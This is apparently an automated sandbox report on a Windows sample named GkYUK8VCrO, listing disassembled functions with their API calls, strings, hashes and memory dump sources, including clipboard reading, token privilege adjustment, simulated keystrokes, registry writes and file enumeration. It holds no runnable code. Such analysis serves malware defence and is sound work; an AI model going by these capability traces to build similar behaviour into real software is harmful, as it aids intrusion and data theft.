Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: fe8c542e0b9c015ce8672a746f327c706e841ae726f17a266f93265ee2266b43
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3131AF71A40105DBC718DF58D480E69FBB6FB59300B6A8AA9E40ACB651DB31EDC1CBC0

Function 00A4229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00A422B1

Memory Dump Source

Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 3c1d1f8ae81557702209bab52da547459dc8225676dc3765e2dc1e690d018573
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: B6E0BF7494010EEFDB00EFA5D5496DE7BB4EF44311F1005A1FD05D7680DB709E548A62

Function 00A422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00A422B1

Memory Dump Source

Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 30f0ad15f589f24e0162945314f8cf9adfa38c3c8fec891298c69158bdf64ea0
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 98E0E67494010EDFDB00EFB5D5496DE7FB4EF44301F100161FD01D2280D6709D508A72

Non-executed Functions

Function 00B2CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B2CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B2CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2CF00
SendMessageW.USER32 ref: 00B2CF29
_wcsncpy.LIBCMT ref: 00B2CFA1
GetKeyState.USER32(00000011), ref: 00B2CFC2
GetKeyState.USER32(00000009), ref: 00B2CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CFE5
GetKeyState.USER32(00000010), ref: 00B2CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2D018
SendMessageW.USER32 ref: 00B2D03F
SendMessageW.USER32(?,00001030,?,00B2B602), ref: 00B2D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B2D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B2D16E
SetCapture.USER32(?), ref: 00B2D177
ClientToScreen.USER32(?,?), ref: 00B2D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B2D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B2D203
ReleaseCapture.USER32 ref: 00B2D20E
GetCursorPos.USER32(?), ref: 00B2D248
ScreenToClient.USER32(?,?), ref: 00B2D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D2B1
SendMessageW.USER32 ref: 00B2D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D31C
SendMessageW.USER32 ref: 00B2D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B2D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B2D37B
GetCursorPos.USER32(?), ref: 00B2D39B
ScreenToClient.USER32(?,?), ref: 00B2D3A8
GetParent.USER32(?), ref: 00B2D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D431
SendMessageW.USER32 ref: 00B2D462
ClientToScreen.USER32(?,?), ref: 00B2D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B2D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D51A
SendMessageW.USER32 ref: 00B2D53D
ClientToScreen.USER32(?,?), ref: 00B2D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B2D5C3

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

GetWindowLongW.USER32(?,000000F0), ref: 00B2D65F

Strings

@GUI_DRAGID, xrefs: 00B2D1AA
F, xrefs: 00B2D543

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 62230436078e1f510551dab5622abe0e8de539ced8fd97b7ec80dba5be0c6fe9
Instruction ID: 866e1635d54ee1c39c2344d74887ad7e8938e89923beabc886809a883147cb27
Opcode Fuzzy Hash: 62230436078e1f510551dab5622abe0e8de539ced8fd97b7ec80dba5be0c6fe9
Instruction Fuzzy Hash: B642AF30204251AFD721DF28D884FAABFF5FF49314F1409ADF659972A0CB71A855CB92

Function 00B2804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B2873F

Strings

%d/%02d/%02d, xrefs: 00B28478

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 2f6fd034ee2a529c4a15f86e1b84613348112f865524bedbd82a1364ace9094f
Instruction ID: 6976105fb2957cd853c79d4b69aa2bd5bb16c862658da80cabf41150385bbfc5
Opcode Fuzzy Hash: 2f6fd034ee2a529c4a15f86e1b84613348112f865524bedbd82a1364ace9094f
Instruction Fuzzy Hash: 8A12C271501225ABEB258F24EC89FAE7BF8EF49710F1041A9F919EB2E1DF708941CB50

Function 00AB710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AB75C2
_memset.LIBCMT ref: 00AB76B1
_memmove.LIBCMT ref: 00AB7C4B
_memmove.LIBCMT ref: 00AB7E4F

Strings

\b(?=\w), xrefs: 00AF3C34
DEFINE, xrefs: 00AF25AF
[:<:]], xrefs: 00AB75F1
\b(?<=\w), xrefs: 00AF3C41
[:>:]], xrefs: 00AB760A
Q\E, xrefs: 00AB81C1

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 09e1bfb4d27a8626373e48c988fc79d8755f494d3304c5d62a8d1a94a886a25a
Instruction ID: 2fd4789b611b509ba348518d3eaa104e5c6e0c5a6db5ede36141a47da3307116
Opcode Fuzzy Hash: 09e1bfb4d27a8626373e48c988fc79d8755f494d3304c5d62a8d1a94a886a25a
Instruction Fuzzy Hash: 58938E71A042199BDF24CF98C891BFDB7B1FF48710F25816AEA55EB281E7749E81CB40

Function 00AA4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00AA4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ADDA8E
IsIconic.USER32(?), ref: 00ADDA97
ShowWindow.USER32(?,00000009), ref: 00ADDAA4
SetForegroundWindow.USER32(?), ref: 00ADDAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ADDAC4
GetCurrentThreadId.KERNEL32 ref: 00ADDACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADDAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADDAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADDAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00ADDAF8
SetForegroundWindow.USER32(?), ref: 00ADDAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB10
keybd_event.USER32(00000012,00000000), ref: 00ADDB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB25
keybd_event.USER32(00000012,00000000), ref: 00ADDB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB33
keybd_event.USER32(00000012,00000000), ref: 00ADDB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB42
keybd_event.USER32(00000012,00000000), ref: 00ADDB47
SetForegroundWindow.USER32(?), ref: 00ADDB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00ADDB71

Strings

Shell_TrayWnd, xrefs: 00ADDA89

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c65fd57fd02616ade0e2776483bac28076d2261dd827726b10316befc43d50b5
Instruction ID: da3680fa4fe54e5f7491656ef30d9ded942bcb7bdaf7abbd3c553762f1bd4f18
Opcode Fuzzy Hash: c65fd57fd02616ade0e2776483bac28076d2261dd827726b10316befc43d50b5
Instruction Fuzzy Hash: C8315071A40319BAEB316FA19C49F7E3E7CEB44B50F114036FA05AB2D0CAB05D01AAA1

Function 00AF8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00AF8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF8D0D
Part of subcall function 00AF8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8D3A
Part of subcall function 00AF8CC3: GetLastError.KERNEL32 ref: 00AF8D47

_memset.LIBCMT ref: 00AF889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AF88ED
CloseHandle.KERNEL32(?), ref: 00AF88FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AF8915
GetProcessWindowStation.USER32 ref: 00AF892E
SetProcessWindowStation.USER32(00000000), ref: 00AF8938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AF8952

Part of subcall function 00AF8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8851), ref: 00AF8728
Part of subcall function 00AF8713: CloseHandle.KERNEL32(?,?,00AF8851), ref: 00AF873A

Strings

default, xrefs: 00AF894D
, xrefs: 00AF88AA
winsta0, xrefs: 00AF8910

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 8d30c80a6f50be43f8cce5c4e40f5f2a058ae23fea3932277222eac23f55f62e
Instruction ID: 32ddff6f32e27c0434ae24bdcc1b25942ae5b5f048da01ebc96c318103342dcc
Opcode Fuzzy Hash: 8d30c80a6f50be43f8cce5c4e40f5f2a058ae23fea3932277222eac23f55f62e
Instruction Fuzzy Hash: F281277190020DABDF21EFE4DD45AFEBBB8EF04344F09416AFA10A6161DB398A15DB60

Function 00B1425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00B2F910), ref: 00B14284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00B14292
GetClipboardData.USER32(0000000D), ref: 00B1429A
CloseClipboard.USER32 ref: 00B142A6
GlobalLock.KERNEL32(00000000), ref: 00B142C2
CloseClipboard.USER32 ref: 00B142CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B142E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00B142EE
GetClipboardData.USER32(00000001), ref: 00B142F6
GlobalLock.KERNEL32(00000000), ref: 00B14303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00B14337
CloseClipboard.USER32 ref: 00B14447

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 9faf4237472a2e0f9616a98d33d38152614e5053ef1b8f6b0d978b93d5f9502c
Instruction ID: 774309e85c5fdc0310b5dbe4840253f76afd0f3499ab2ec76ffd4a2c41257622
Opcode Fuzzy Hash: 9faf4237472a2e0f9616a98d33d38152614e5053ef1b8f6b0d978b93d5f9502c
Instruction Fuzzy Hash: 92518B71204202ABD321AB60ED8AFBF77B8EF85B00F504579F556D32E1DF70D9468A62

Function 00B0C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0C9F8
FindClose.KERNEL32(00000000), ref: 00B0CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B0CAAF
__swprintf.LIBCMT ref: 00B0CAFB
__swprintf.LIBCMT ref: 00B0CB3E

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

__swprintf.LIBCMT ref: 00B0CB92

Part of subcall function 00AC38D8: __woutput_l.LIBCMT ref: 00AC3931

__swprintf.LIBCMT ref: 00B0CBE0

Part of subcall function 00AC38D8: __flsbuf.LIBCMT ref: 00AC3953
Part of subcall function 00AC38D8: __flsbuf.LIBCMT ref: 00AC396B

__swprintf.LIBCMT ref: 00B0CC2F
__swprintf.LIBCMT ref: 00B0CC7E
__swprintf.LIBCMT ref: 00B0CCCD

Strings

%4d, xrefs: 00B0CB38
%02d, xrefs: 00B0CB86, 00B0CB90, 00B0CBDE, 00B0CC2D, 00B0CC7C, 00B0CCCB
%4d%02d%02d%02d%02d%02d, xrefs: 00B0CAF5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 8e87796a027e8a56d3c1c27f3956b2ac3abce5630dead969df6b73078403f851
Instruction ID: dcd9dfab6ae8f6616ed10e6220bd460bddcea5e97b3585ab7d60b38c8e770220
Opcode Fuzzy Hash: 8e87796a027e8a56d3c1c27f3956b2ac3abce5630dead969df6b73078403f851
Instruction Fuzzy Hash: F4A10EB2508305ABC710EB64CD85EAFB7ECEF95700F40496DB586D7191EB34DA09CB62

Function 00B0F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B0F221
_wcscmp.LIBCMT ref: 00B0F236
_wcscmp.LIBCMT ref: 00B0F24D
GetFileAttributesW.KERNEL32(?), ref: 00B0F25F
SetFileAttributesW.KERNEL32(?,?), ref: 00B0F279
FindNextFileW.KERNEL32(00000000,?), ref: 00B0F291
FindClose.KERNEL32(00000000), ref: 00B0F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F2B8
_wcscmp.LIBCMT ref: 00B0F2DF
_wcscmp.LIBCMT ref: 00B0F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F308
SetCurrentDirectoryW.KERNEL32(00B5A5A0), ref: 00B0F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F330
FindClose.KERNEL32(00000000), ref: 00B0F33D
FindClose.KERNEL32(00000000), ref: 00B0F34F

Strings

*.*, xrefs: 00B0F2B3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: db04e00fd855a179507a7f6f4d6dfb981535c81b266daf0dd54633bb0870004c
Instruction ID: 02aab57da271c88c0cac0178ece08f9d98cfbec69f9d8c9e5f27a59b1f885437
Opcode Fuzzy Hash: db04e00fd855a179507a7f6f4d6dfb981535c81b266daf0dd54633bb0870004c
Instruction Fuzzy Hash: 3F31837660121A6ADB20DBA4EC49EFE77ECEF49361F1441B5F814E30E0EB70DA458A54

Function 00B20AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B2F910,00000000,?,00000000,?,?), ref: 00B20C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B20C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B20D1D
RegCloseKey.ADVAPI32(?), ref: 00B2103D
RegCloseKey.ADVAPI32(00000000), ref: 00B2104A

Strings

REG_MULTI_SZ, xrefs: 00B20E05
REG_BINARY, xrefs: 00B20FD8
REG_SZ, xrefs: 00B20D5B
REG_EXPAND_SZ, xrefs: 00B20CBA
REG_DWORD, xrefs: 00B20F0E
REG_QWORD, xrefs: 00B20F8B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 079a08074da558f8ae250aabc4d6337c6be56ad6ebcb806b9b6bea461d526eb0
Instruction ID: bd8457619e966e73887b317fb6283acaef41fc35b4ac922ea403efd0ad1f041e
Opcode Fuzzy Hash: 079a08074da558f8ae250aabc4d6337c6be56ad6ebcb806b9b6bea461d526eb0
Instruction Fuzzy Hash: BE024C752006119FCB14EF28D995E2BB7E5FF89714F04889DF8899B2A2DB31ED41CB81

Function 00B0F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B0F37E
_wcscmp.LIBCMT ref: 00B0F393
_wcscmp.LIBCMT ref: 00B0F3AA

Part of subcall function 00B045C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B045DC

FindNextFileW.KERNEL32(00000000,?), ref: 00B0F3D9
FindClose.KERNEL32(00000000), ref: 00B0F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F400
_wcscmp.LIBCMT ref: 00B0F427
_wcscmp.LIBCMT ref: 00B0F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F450
SetCurrentDirectoryW.KERNEL32(00B5A5A0), ref: 00B0F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F478
FindClose.KERNEL32(00000000), ref: 00B0F485
FindClose.KERNEL32(00000000), ref: 00B0F497

Strings

*.*, xrefs: 00B0F3FB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
